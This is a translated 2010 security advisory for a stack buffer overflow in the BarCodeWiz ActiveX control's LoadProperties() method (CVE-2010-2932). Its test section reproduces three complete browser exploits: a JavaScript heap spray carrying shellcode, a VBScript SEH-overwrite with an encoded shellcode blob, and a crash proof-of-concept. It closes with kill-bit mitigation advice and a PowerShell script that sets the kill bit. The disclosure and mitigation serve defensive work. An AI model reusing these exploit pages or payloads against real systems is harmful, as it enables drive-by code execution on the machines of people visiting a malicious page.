BarCodeWiz Barcode Control LoadProperties() Method Stack Overflow Vulnerability

Published: 2010-08-02
Updated: 2010-08-04

Affected systems:
GetMySystem BarCodeWiz 3.29
Description:
BUGTRAQ ID: 42097
CVE(CAN) ID: CVE-2010-2932

The BarCodeWiz Barcode ActiveX control is a barcode printing control.

BarcodeWiz.dll does not correctly handle the argument passed to the LoadProperties() method. A user who is tricked into visiting a malicious web page that passes an overly long string to this method triggers a stack-based buffer overflow, which can lead to arbitrary code execution in the context of the browser.

<*Source: loneferret
  
  Link: http://secunia.com/advisories/40786/
*>

Test method:

Warning

The following programs (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use at your own risk!

<html>
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object>
<script language='javascript'>

// Payload is win32_exec - calc.exe
shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
                    '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
                    '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
                    '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
                    '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
                    '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
                    '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
                    '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');

// Heap spray: fill the browser heap with 0x40000-byte blocks of NOP sled followed
// by the shellcode, so that the address 0x0a0a0a0a written below lands in a sled.
nops=unescape('%u9090%u9090');
headersize = 69;  //size adjusted for IE6/IE7 "universality"
slackspace= headersize + shellcode.length;
while(nops.length<slackspace) nops+=nops;
fillblock=nops.substring(0,slackspace);
block=nops.substring(0,nops.length-slackspace);
while(block.length+slackspace<0x40000) block=block+block+fillblock;
memory=new Array();
for( counter=0; counter<250; counter++) memory[counter]= block + shellcode;

// Trigger: an over-long argument made of 0x0a bytes overflows the stack buffer
// in LoadProperties(), so the overwritten pointer reads 0x0a0a0a0a (inside the spray).
ret='';
for( counter=0; counter<=1000; counter++) ret+=unescape("%0a%0a%0a%0a");
target.LoadProperties(ret);

</script>
</html>




<html>
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object>
<script language='vbscript'>

' SEH overwrite variant: 97 bytes of filler reach the SEH record. The next-SEH
' field receives a short jump (EB 06) over the handler address, the handler
' address is replaced with 0x1002f44b (the address chosen by the PoC author,
' little-endian), and the shellcode follows immediately after the record.
buffer = String(97,"A")
jmp = unescape("%eb%06%41%41")
SEH = unescape("%4b%f4%02%10")

' Encoded shellcode as supplied in the original PoC.
shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")
shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")
shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")
shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")
shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")
shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")

' Trailing padding keeps the overflow running past the end of the stack frame
' so that an exception is raised and the overwritten handler is invoked.
buffer2 = String(1552, "C")

arg1 = buffer + jmp + SEH + shellcode + buffer2

target.LoadProperties arg1

</script>
Barcodewiz 3.29
</html>



<html>
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object>
<script language='vbscript'>

' Crash PoC: 101 bytes of filler, then four "B" bytes that land on the SE
' handler pointer (0x42424242), then padding to force the exception. Useful
' for confirming the offset under a debugger before building the full exploit.
buffer = String(101,"A")
SEH = String(4, "B")
buffer2 = String(1895, "C")

arg1 = buffer + SEH + buffer2

target.LoadProperties arg1

</script>

Barcodewiz 3.29
</html>

Recommendation:
Workaround:

* Set the kill bit for CLSID CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6. Note that the kill bit only stops Internet Explorer from instantiating the control; the DLL stays registered and other COM hosts can still load it, so unregistering or removing the control is the stronger measure where it is not needed.
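The kill bit is a DWORD named "Compatibility Flags" with bit 0x400 set, stored under the ActiveX Compatibility key for the control's CLSID. The following PowerShell is an added example, not part of this advisory or of loneferret's PoC: it reports whether the bit is set in every registry view Internet Explorer consults and sets it in place, OR-ing the bit in so that any other compatibility flags already present are preserved. The function names and the $CompatKeys variable are this example's own; the registry location and the 0x400 value are Microsoft's documented kill-bit mechanism.

```powershell
# Added example (not from the advisory or the original PoC): check and set the
# Internet Explorer kill bit for the BarCodeWiz control's CLSID.
$BarCodeWizClsid = '{CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}'
$KillBitFlag     = 0x400   # "Compatibility Flags" bit: IE refuses to instantiate the control

# On 64-bit Windows the 32-bit IE process reads the Wow6432Node view,
# so the flag has to be present in both views to be effective.
$CompatKeys = @('HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility')
if ([Environment]::Is64BitOperatingSystem) {
    $CompatKeys += 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
}

function Test-KillBit {
    param([Parameter(Mandatory)][string]$Clsid)
    foreach ($base in $CompatKeys) {
        $key   = Join-Path $base $Clsid
        $flags = 0
        if (Test-Path $key) {
            # A missing value casts to 0, i.e. no kill bit.
            $flags = [int](Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Compatibility Flags'
        }
        [pscustomobject]@{
            Key     = $key
            Flags   = '0x{0:X}' -f $flags
            KillBit = (($flags -band $KillBitFlag) -ne 0)
        }
    }
}

function Set-KillBit {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Clsid)
    foreach ($base in $CompatKeys) {
        $key = Join-Path $base $Clsid
        if (-not $PSCmdlet.ShouldProcess($key, 'Compatibility Flags |= 0x400')) { continue }
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        # OR the bit in rather than overwriting, so other flags on the CLSID survive.
        $current = [int](Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Compatibility Flags'
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value ($current -bor $KillBitFlag) -Type DWord
    }
}

# Usage (elevated PowerShell):
Test-KillBit -Clsid $BarCodeWizClsid           # KillBit = False on an unmitigated host
Set-KillBit  -Clsid $BarCodeWizClsid -WhatIf   # drop -WhatIf to apply the change
Test-KillBit -Clsid $BarCodeWizClsid           # KillBit = True in every view once applied
```

Run Test-KillBit before and after; on a 64-bit host both rows must report KillBit = True, otherwise a 32-bit Internet Explorer will still load the control. The same two functions work for any other CLSID an advisory asks you to block.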

Vendor patch:

GetMySystem
-----------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:

http://www.taltech.com/products/activex_barcodes.html

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.